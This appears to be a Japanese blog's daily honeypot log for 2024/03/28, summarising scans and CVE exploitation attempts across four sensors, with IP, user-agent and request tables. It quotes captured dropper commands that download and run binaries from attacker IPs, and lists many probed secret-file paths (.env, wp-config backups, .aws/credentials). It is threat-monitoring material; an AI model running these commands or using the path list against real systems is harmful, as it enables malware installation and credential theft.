2024/03/28 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/03/28分です。

特徴

共通

/.envへのスキャン行為

Location:JP

curlによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.dockerへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

Apache OFBizの脆弱性(CVE-2023-51467)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
/.gitへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf shk;
wget http:/\\/89.190.156.173/shk;
chmod 777 shk;
./shk jaws;
rm -rf shk

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf shk;
wget http:/\\/89.190.156.173/shk;
chmod 777 shk;
./shk jaws;
rm -rf shk

cd /tmp;
rm -rf *;
wget  109.205.214.35/arm;
chmod 777 /tmp/arm;
sh /tmp/arm4

Location:SG

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Gh0stRATのような動き

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf shk;
wget http:/\\/89.190.156.173/shk;
chmod 777 shk;
./shk jaws;
rm -rf shk

他

アクセス数推移

JP：総アクセス数：499 (前日比：406)
US：総アクセス数：53 (前日比：-269)
UK：総アクセス数：61 (前日比：-23)
SG：総アクセス数：67 (前日比：-21)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	31.220.98.203	Spain
1	35.91.58.212	United States
1	44.211.29.75	United States
1	45.56.108.128	United States
1	64.62.197.112	United States
1	64.62.197.117	United States
1	64.62.197.169	United States
13	64.227.177.95	United States
2	67.219.100.242	United States
1	87.121.69.52	Bulgaria
1	91.92.251.45	Bulgaria
2	101.32.192.203	Singapore
2	102.88.81.130	Nigeria
3	103.56.17.252	China
436	103.101.52.32	Indonesia
1	104.248.168.198	United States
3	135.125.244.48	France
12	135.125.246.189	France
2	144.126.136.77	United States
1	162.243.144.11	United States
1	163.179.210.82	China
1	166.88.141.168	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	185.100.87.136	Seychelles
2	185.254.196.173	Ukraine
2	198.235.24.9	United States
2	198.235.24.229	United States

UserAgent一覧

件数	UserAgent
13	`-`
4	`Go-http-client/1.1`
2	`Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
436	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0`
1	`curl/8.1.2`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01\x18\x01`
1		`\x16\x03\x01\x01\xfa\x01`
10		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.config/gatsby/config.json`	HTTP/1.1
1	GET	`/.cordova/config.json`	HTTP/1.1
1	GET	`/.deployment-config.json`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/config.json`	HTTP/1.1
1	GET	`/.docker/daemon.json`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.development.local`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.docker.dev`	HTTP/1.1
2	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.php`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.sample.php`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.stage`	HTTP/1.1
1	GET	`/.env.staging`	HTTP/1.1
1	GET	`/.env.test.local`	HTTP/1.1
1	GET	`/.env.test`	HTTP/1.1
24	GET	`/.env`	HTTP/1.1
1	GET	`/.environment`	HTTP/1.1
1	GET	`/.envrc`	HTTP/1.1
1	GET	`/.envs`	HTTP/1.1
1	GET	`/.env~`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.gitlab-ci/.env`	HTTP/1.1
1	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
1	GET	`/.lanproxy/config.json`	HTTP/1.1
1	GET	`/.msmtprc`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`/.wp-config.php.swo`	HTTP/1.1
1	GET	`/.wp-config.swp`	HTTP/1.1
1	GET	`//api/info.php`	HTTP/1.1
1	GET	`//api/phpinfo.php`	HTTP/1.1
1	GET	`//backend/info.php`	HTTP/1.1
1	GET	`//backend/phpinfo.php`	HTTP/1.1
1	GET	`//backup/info.php`	HTTP/1.1
1	GET	`//backup/phpinfo.php`	HTTP/1.1
1	GET	`//crm/info.php`	HTTP/1.1
1	GET	`//crm/phpinfo.php`	HTTP/1.1
1	GET	`//current/info.php`	HTTP/1.1
1	GET	`//current/phpinfo.php`	HTTP/1.1
1	GET	`//dev/info.php`	HTTP/1.1
1	GET	`//dev/phpinfo.php`	HTTP/1.1
1	GET	`//develop/info.php`	HTTP/1.1
1	GET	`//develop/phpinfo.php`	HTTP/1.1
1	GET	`//development/iinfo.php`	HTTP/1.1
1	GET	`//development/phpinfo.php`	HTTP/1.1
1	GET	`//help/info.php`	HTTP/1.1
1	GET	`//help/phpinfo.php`	HTTP/1.1
1	GET	`//helper/info.php`	HTTP/1.1
1	GET	`//helper/phpinfo.php`	HTTP/1.1
1	GET	`//info[.]php`	HTTP/1.1
1	GET	`//lara/info.php`	HTTP/1.1
1	GET	`//lara/phpinfo.php`	HTTP/1.1
1	GET	`//laravel/info.php`	HTTP/1.1
1	GET	`//laravel/phpinfo.php`	HTTP/1.1
1	GET	`//phpinfo`	HTTP/1.1
1	GET	`//server/info.php`	HTTP/1.1
1	GET	`//server/phpinfo.php`	HTTP/1.1
1	GET	`//service/info.php`	HTTP/1.1
1	GET	`//service/phpinfo.php`	HTTP/1.1
1	GET	`//services/info.php`	HTTP/1.1
1	GET	`//services/phpinfo.php`	HTTP/1.1
1	GET	`//xampp/info.php`	HTTP/1.1
1	GET	`//xampp/phpinfo.php`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/admin/.env.local`	HTTP/1.1
1	GET	`/admin/.env.production`	HTTP/1.1
1	GET	`/admin/.env.staging`	HTTP/1.1
2	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env.local`	HTTP/1.1
1	GET	`/api/.env.production`	HTTP/1.1
1	GET	`/api/.env.staging`	HTTP/1.1
3	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/v1/notices`	HTTP/1.1
1	GET	`/apis/.env.local`	HTTP/1.1
1	GET	`/apis/.env.production`	HTTP/1.1
1	GET	`/apis/.env.staging`	HTTP/1.1
1	GET	`/apis/.env`	HTTP/1.1
1	GET	`/app/.env.local`	HTTP/1.1
1	GET	`/app/.env.production`	HTTP/1.1
1	GET	`/app/.env.staging`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config.yml`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/asdf.php`	HTTP/1.1
1	GET	`/backend/.env.local`	HTTP/1.1
1	GET	`/backend/.env.production`	HTTP/1.1
1	GET	`/backend/.env.staging`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/backup.wp-config.php`	HTTP/1.1
1	GET	`/backup/.env.local`	HTTP/1.1
1	GET	`/backup/.env.production`	HTTP/1.1
1	GET	`/backup/.env.staging`	HTTP/1.1
1	GET	`/backup/.env`	HTTP/1.1
1	GET	`/beta/.env.local`	HTTP/1.1
1	GET	`/beta/.env.production`	HTTP/1.1
1	GET	`/beta/.env.staging`	HTTP/1.1
2	GET	`/beta/.env`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/client/.env.local`	HTTP/1.1
1	GET	`/client/.env.production`	HTTP/1.1
1	GET	`/client/.env.staging`	HTTP/1.1
1	GET	`/client/.env`	HTTP/1.1
1	GET	`/config.env`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/config.js`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
1	GET	`/config/secrets.yml`	HTTP/1.1
1	GET	`/console/base/config.json`	HTTP/1.1
1	GET	`/console/payments/config.json`	HTTP/1.1
1	GET	`/crm/.env.local`	HTTP/1.1
1	GET	`/crm/.env.production`	HTTP/1.1
1	GET	`/crm/.env.staging`	HTTP/1.1
1	GET	`/crm/.env`	HTTP/1.1
1	GET	`/cron/.env.local`	HTTP/1.1
1	GET	`/cron/.env.production`	HTTP/1.1
1	GET	`/cron/.env.staging`	HTTP/1.1
1	GET	`/cron/.env`	HTTP/1.1
1	GET	`/current/.env.local`	HTTP/1.1
1	GET	`/current/.env.production`	HTTP/1.1
1	GET	`/current/.env.staging`	HTTP/1.1
1	GET	`/current/.env`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/database.yml`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/demo/.env.local`	HTTP/1.1
1	GET	`/demo/.env.production`	HTTP/1.1
1	GET	`/demo/.env.staging`	HTTP/1.1
1	GET	`/demo/.env`	HTTP/1.1
1	GET	`/dev/.env.local`	HTTP/1.1
1	GET	`/dev/.env.production`	HTTP/1.1
1	GET	`/dev/.env.staging`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/develop/.env.local`	HTTP/1.1
1	GET	`/develop/.env.production`	HTTP/1.1
1	GET	`/develop/.env.staging`	HTTP/1.1
1	GET	`/develop/.env`	HTTP/1.1
1	GET	`/development/.env.local`	HTTP/1.1
1	GET	`/development/.env.production`	HTTP/1.1
1	GET	`/development/.env.staging`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/env.backup`	HTTP/1.1
1	GET	`/env.config.js`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
1	GET	`/index%20js`	HTTP/1.1
1	GET	`/index.json`	HTTP/1.1
1	GET	`/info.json`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/infos.php`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/js/envConfig.js`	HTTP/1.1
1	GET	`/kyc/.env.local`	HTTP/1.1
1	GET	`/kyc/.env.production`	HTTP/1.1
1	GET	`/kyc/.env.staging`	HTTP/1.1
2	GET	`/kyc/.env`	HTTP/1.1
1	GET	`/laravel/.env.local`	HTTP/1.1
1	GET	`/laravel/.env.production`	HTTP/1.1
1	GET	`/laravel/.env.staging`	HTTP/1.1
3	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/laravel/core/.env.local`	HTTP/1.1
1	GET	`/laravel/core/.env.production`	HTTP/1.1
1	GET	`/laravel/core/.env.staging`	HTTP/1.1
2	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`/live/.env.local`	HTTP/1.1
1	GET	`/live/.env.production`	HTTP/1.1
1	GET	`/live/.env.staging`	HTTP/1.1
1	GET	`/live/.env`	HTTP/1.1
1	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/market/.env.local`	HTTP/1.1
1	GET	`/market/.env.production`	HTTP/1.1
1	GET	`/market/.env.staging`	HTTP/1.1
1	GET	`/market/.env`	HTTP/1.1
1	GET	`/marketing/.env.local`	HTTP/1.1
1	GET	`/marketing/.env.production`	HTTP/1.1
1	GET	`/marketing/.env.staging`	HTTP/1.1
1	GET	`/marketing/.env`	HTTP/1.1
1	GET	`/new/.env.local`	HTTP/1.1
1	GET	`/new/.env.production`	HTTP/1.1
1	GET	`/new/.env.staging`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/old/.env.local`	HTTP/1.1
1	GET	`/old/.env.production`	HTTP/1.1
1	GET	`/old/.env.staging`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/old_phpinfo.php`	HTTP/1.1
1	GET	`/pCaequeitoo5er2Z`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpmyadmin/`	HTTP/1.1
1	GET	`/phpmyadmin`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/portal/.env.local`	HTTP/1.1
1	GET	`/portal/.env.production`	HTTP/1.1
1	GET	`/portal/.env.staging`	HTTP/1.1
1	GET	`/portal/.env`	HTTP/1.1
1	GET	`/prod/.env.local`	HTTP/1.1
1	GET	`/prod/.env.production`	HTTP/1.1
1	GET	`/prod/.env.staging`	HTTP/1.1
2	GET	`/prod/.env`	HTTP/1.1
1	GET	`/product/.env.local`	HTTP/1.1
1	GET	`/product/.env.production`	HTTP/1.1
1	GET	`/product/.env.staging`	HTTP/1.1
1	GET	`/product/.env`	HTTP/1.1
1	GET	`/production/.env.local`	HTTP/1.1
1	GET	`/production/.env.production`	HTTP/1.1
1	GET	`/production/.env.staging`	HTTP/1.1
1	GET	`/production/.env`	HTTP/1.1
1	GET	`/project/.env.local`	HTTP/1.1
1	GET	`/project/.env.production`	HTTP/1.1
1	GET	`/project/.env.staging`	HTTP/1.1
1	GET	`/project/.env`	HTTP/1.1
1	GET	`/public/.env.local`	HTTP/1.1
1	GET	`/public/.env.production`	HTTP/1.1
1	GET	`/public/.env.staging`	HTTP/1.1
2	GET	`/public/.env`	HTTP/1.1
1	GET	`/public_html/.env.local`	HTTP/1.1
1	GET	`/public_html/.env.production`	HTTP/1.1
1	GET	`/public_html/.env.staging`	HTTP/1.1
1	GET	`/public_html/.env`	HTTP/1.1
1	GET	`/qa/.env.local`	HTTP/1.1
1	GET	`/qa/.env.production`	HTTP/1.1
1	GET	`/qa/.env.staging`	HTTP/1.1
1	GET	`/qa/.env`	HTTP/1.1
1	GET	`/secrets.yml`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/server/.env.local`	HTTP/1.1
1	GET	`/server/.env.production`	HTTP/1.1
1	GET	`/server/.env.staging`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
1	GET	`/service/.env.local`	HTTP/1.1
1	GET	`/service/.env.production`	HTTP/1.1
1	GET	`/service/.env.staging`	HTTP/1.1
1	GET	`/service/.env`	HTTP/1.1
1	GET	`/services/.env.local`	HTTP/1.1
1	GET	`/services/.env.production`	HTTP/1.1
1	GET	`/services/.env.staging`	HTTP/1.1
1	GET	`/services/.env`	HTTP/1.1
1	GET	`/shop/.env.local`	HTTP/1.1
1	GET	`/shop/.env.production`	HTTP/1.1
1	GET	`/shop/.env.staging`	HTTP/1.1
1	GET	`/shop/.env`	HTTP/1.1
1	GET	`/staging/.env.local`	HTTP/1.1
1	GET	`/staging/.env.production`	HTTP/1.1
1	GET	`/staging/.env.staging`	HTTP/1.1
1	GET	`/staging/.env`	HTTP/1.1
1	GET	`/stg/.env.local`	HTTP/1.1
1	GET	`/stg/.env.production`	HTTP/1.1
1	GET	`/stg/.env.staging`	HTTP/1.1
1	GET	`/stg/.env`	HTTP/1.1
1	GET	`/storage/.env.local`	HTTP/1.1
1	GET	`/storage/.env.production`	HTTP/1.1
1	GET	`/storage/.env.staging`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/temp.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/test/.env.local`	HTTP/1.1
1	GET	`/test/.env.production`	HTTP/1.1
1	GET	`/test/.env.staging`	HTTP/1.1
1	GET	`/test/.env`	HTTP/1.1
1	GET	`/time.php`	HTTP/1.1
1	GET	`/twitter/.env`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/user/.env.local`	HTTP/1.1
1	GET	`/user/.env.staging`	HTTP/1.1
1	GET	`/user/.env`	HTTP/1.1
1	GET	`/web/.env.local`	HTTP/1.1
1	GET	`/web/.env.production`	HTTP/1.1
1	GET	`/web/.env.staging`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/website/.env.local`	HTTP/1.1
1	GET	`/website/.env.production`	HTTP/1.1
1	GET	`/website/.env.staging`	HTTP/1.1
1	GET	`/website/.env`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-config%20-%20Copy.php`	HTTP/1.1
1	GET	`/wp-config%20copy.php`	HTTP/1.1
1	GET	`/wp-config-backup.php`	HTTP/1.1
1	GET	`/wp-config-backup.txt`	HTTP/1.1
1	GET	`/wp-config-backup1.txt`	HTTP/1.1
1	GET	`/wp-config-backup`	HTTP/1.1
1	GET	`/wp-config-good`	HTTP/1.1
1	GET	`/wp-config-sample.php.bak`	HTTP/1.1
1	GET	`/wp-config-sample.php`	HTTP/1.1
1	GET	`/wp-config-sample.php~`	HTTP/1.1
1	GET	`/wp-config.ORG`	HTTP/1.1
1	GET	`/wp-config.backup`	HTTP/1.1
1	GET	`/wp-config.bak`	HTTP/1.1
1	GET	`/wp-config.bkp`	HTTP/1.1
1	GET	`/wp-config.cfg`	HTTP/1.1
1	GET	`/wp-config.conf`	HTTP/1.1
1	GET	`/wp-config.data`	HTTP/1.1
1	GET	`/wp-config.dump`	HTTP/1.1
1	GET	`/wp-config.good`	HTTP/1.1
1	GET	`/wp-config.htm`	HTTP/1.1
1	GET	`/wp-config.html`	HTTP/1.1
1	GET	`/wp-config.inc`	HTTP/1.1
1	GET	`/wp-config.local.php`	HTTP/1.1
1	GET	`/wp-config.old.old`	HTTP/1.1
1	GET	`/wp-config.old`	HTTP/1.1
1	GET	`/wp-config.orig`	HTTP/1.1
1	GET	`/wp-config.original`	HTTP/1.1
1	GET	`/wp-config.php-`	HTTP/1.1
2	GET	`/wp-config.php-backup`	HTTP/1.1
1	GET	`/wp-config.php-bak`	HTTP/1.1
1	GET	`/wp-config.php-n`	HTTP/1.1
1	GET	`/wp-config.php-o`	HTTP/1.1
1	GET	`/wp-config.php-old`	HTTP/1.1
1	GET	`/wp-config.php-original`	HTTP/1.1
1	GET	`/wp-config.php-save`	HTTP/1.1
1	GET	`/wp-config.php-work`	HTTP/1.1
1	GET	`/wp-config.php.0`	HTTP/1.1
1	GET	`/wp-config.php.1`	HTTP/1.1
1	GET	`/wp-config.php.2`	HTTP/1.1
1	GET	`/wp-config.php.3`	HTTP/1.1
1	GET	`/wp-config.php.4`	HTTP/1.1
1	GET	`/wp-config.php.5`	HTTP/1.1
1	GET	`/wp-config.php.6`	HTTP/1.1
1	GET	`/wp-config.php.7`	HTTP/1.1
1	GET	`/wp-config.php.8`	HTTP/1.1
1	GET	`/wp-config.php.9`	HTTP/1.1
1	GET	`/wp-config.php.a`	HTTP/1.1
1	GET	`/wp-config.php.aws`	HTTP/1.1
1	GET	`/wp-config.php.azure`	HTTP/1.1
1	GET	`/wp-config.php.b`	HTTP/1.1
1	GET	`/wp-config.php.backup.txt`	HTTP/1.1
1	GET	`/wp-config.php.backup`	HTTP/1.1
1	GET	`/wp-config.php.bak1`	HTTP/1.1
2	GET	`/wp-config.php.bak`	HTTP/1.1
1	GET	`/wp-config.php.bk`	HTTP/1.1
1	GET	`/wp-config.php.bkp`	HTTP/1.1
1	GET	`/wp-config.php.c`	HTTP/1.1
1	GET	`/wp-config.php.com`	HTTP/1.1
1	GET	`/wp-config.php.cust`	HTTP/1.1
1	GET	`/wp-config.php.dev`	HTTP/1.1
1	GET	`/wp-config.php.disabled`	HTTP/1.1
1	GET	`/wp-config.php.dist`	HTTP/1.1
1	GET	`/wp-config.php.dump`	HTTP/1.1
1	GET	`/wp-config.php.html`	HTTP/1.1
1	GET	`/wp-config.php.in`	HTTP/1.1
1	GET	`/wp-config.php.inc`	HTTP/1.1
1	GET	`/wp-config.php.local`	HTTP/1.1
1	GET	`/wp-config.php.maj`	HTTP/1.1
1	GET	`/wp-config.php.new`	HTTP/1.1
2	GET	`/wp-config.php.old`	HTTP/1.1
1	GET	`/wp-config.php.org`	HTTP/1.1
1	GET	`/wp-config.php.orig`	HTTP/1.1
1	GET	`/wp-config.php.original`	HTTP/1.1
1	GET	`/wp-config.php.php-bak`	HTTP/1.1
1	GET	`/wp-config.php.prod`	HTTP/1.1
1	GET	`/wp-config.php.production`	HTTP/1.1
1	GET	`/wp-config.php.sample`	HTTP/1.1
1	GET	`/wp-config.php.save.1`	HTTP/1.1
1	GET	`/wp-config.php.save`	HTTP/1.1
1	GET	`/wp-config.php.stage`	HTTP/1.1
1	GET	`/wp-config.php.staging`	HTTP/1.1
1	GET	`/wp-config.php.swn`	HTTP/1.1
1	GET	`/wp-config.php.swo`	HTTP/1.1
2	GET	`/wp-config.php.swp`	HTTP/1.1
1	GET	`/wp-config.php.tar`	HTTP/1.1
1	GET	`/wp-config.php.temp`	HTTP/1.1
1	GET	`/wp-config.php.tmp`	HTTP/1.1
1	GET	`/wp-config.php.txt`	HTTP/1.1
1	GET	`/wp-config.php.uk`	HTTP/1.1
1	GET	`/wp-config.php.us`	HTTP/1.1
1	GET	`/wp-config.php1`	HTTP/1.1
1	GET	`/wp-config.php=`	HTTP/1.1
1	GET	`/wp-config.php_1`	HTTP/1.1
1	GET	`/wp-config.php______`	HTTP/1.1
1	GET	`/wp-config.php__`	HTTP/1.1
1	GET	`/wp-config.php__olds`	HTTP/1.1
1	GET	`/wp-config.php_`	HTTP/1.1
1	GET	`/wp-config.php_backup`	HTTP/1.1
1	GET	`/wp-config.php_bak`	HTTP/1.1
1	GET	`/wp-config.php_bk`	HTTP/1.1
1	GET	`/wp-config.php_new`	HTTP/1.1
1	GET	`/wp-config.php_old2017`	HTTP/1.1
1	GET	`/wp-config.php_old2018`	HTTP/1.1
1	GET	`/wp-config.php_old2019`	HTTP/1.1
1	GET	`/wp-config.php_old2020`	HTTP/1.1
1	GET	`/wp-config.php_old`	HTTP/1.1
1	GET	`/wp-config.php_orig`	HTTP/1.1
1	GET	`/wp-config.php_original`	HTTP/1.1
1	GET	`/wp-config.php`	HTTP/1.1
1	GET	`/wp-config.phpa`	HTTP/1.1
1	GET	`/wp-config.phpb`	HTTP/1.1
1	GET	`/wp-config.phpbak`	HTTP/1.1
1	GET	`/wp-config.phpc`	HTTP/1.1
1	GET	`/wp-config.phpd`	HTTP/1.1
1	GET	`/wp-config.phpn`	HTTP/1.1
1	GET	`/wp-config.phpnew`	HTTP/1.1
1	GET	`/wp-config.phpold`	HTTP/1.1
1	GET	`/wp-config.phporiginal`	HTTP/1.1
1	GET	`/wp-config.phptmp`	HTTP/1.1
1	GET	`/wp-config.php~`	HTTP/1.1
1	GET	`/wp-config.php~~~`	HTTP/1.1
1	GET	`/wp-config.prod.php.txt`	HTTP/1.1
1	GET	`/wp-config.save`	HTTP/1.1
1	GET	`/wp-config.tar`	HTTP/1.1
1	GET	`/wp-config.temp`	HTTP/1.1
1	GET	`/wp-config.txt`	HTTP/1.1
1	GET	`/wp-config.zip`	HTTP/1.1
1	GET	`/wp-config_backup`	HTTP/1.1
1	GET	`/wp-config_good`	HTTP/1.1
1	GET	`/wp-config`	HTTP/1.1
1	GET	`/wp-configbak`	HTTP/1.1
1	GET	`/wp-config~`	HTTP/1.1
1	GET	`/xampp/.env.local`	HTTP/1.1
1	GET	`/xampp/.env.production`	HTTP/1.1
1	GET	`/xampp/.env.staging`	HTTP/1.1
1	GET	`/xampp/.env`	HTTP/1.1
1	GET	`/xampp/info.php`	HTTP/1.1
1	GET	`/xampp/phpinfo`	HTTP/1.1
2	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.185.40.145	United States
1	35.90.35.82	United States
1	36.99.136.128	China
1	45.79.181.104	United States
1	45.79.181.179	United States
2	54.36.115.221	France
1	54.37.79.75	France
1	64.62.197.43	United States
2	64.62.197.46	United States
1	64.62.197.214	United States
2	78.153.140.179	Russia
2	83.97.73.245	Germany
3	87.121.69.52	Bulgaria
1	99.250.26.6	Canada
1	104.131.176.59	United States
1	125.92.107.211	China
2	134.209.110.165	United States
1	139.59.101.104	Singapore
2	143.198.204.194	United States
2	146.190.106.242	United States
1	149.5.172.38	United States
4	157.245.221.44	United States
1	157.254.223.198	United States
1	157.254.237.223	United States
1	159.223.38.219	United States
2	165.22.54.194	United States
2	167.71.197.10	United States
2	167.94.145.56	United States
1	170.64.149.186	United States
1	172.104.11.34	United States
3	172.105.128.13	United States
1	178.62.69.67	United States
1	185.224.128.34	Netherlands
1	192.3.223.21	United States
2	205.210.31.20	United States

UserAgent一覧

件数	UserAgent
18	`-`
4	`Go-http-client/1.1`
1	`Mozilla/2.02E (Win95; U)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0`
6	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
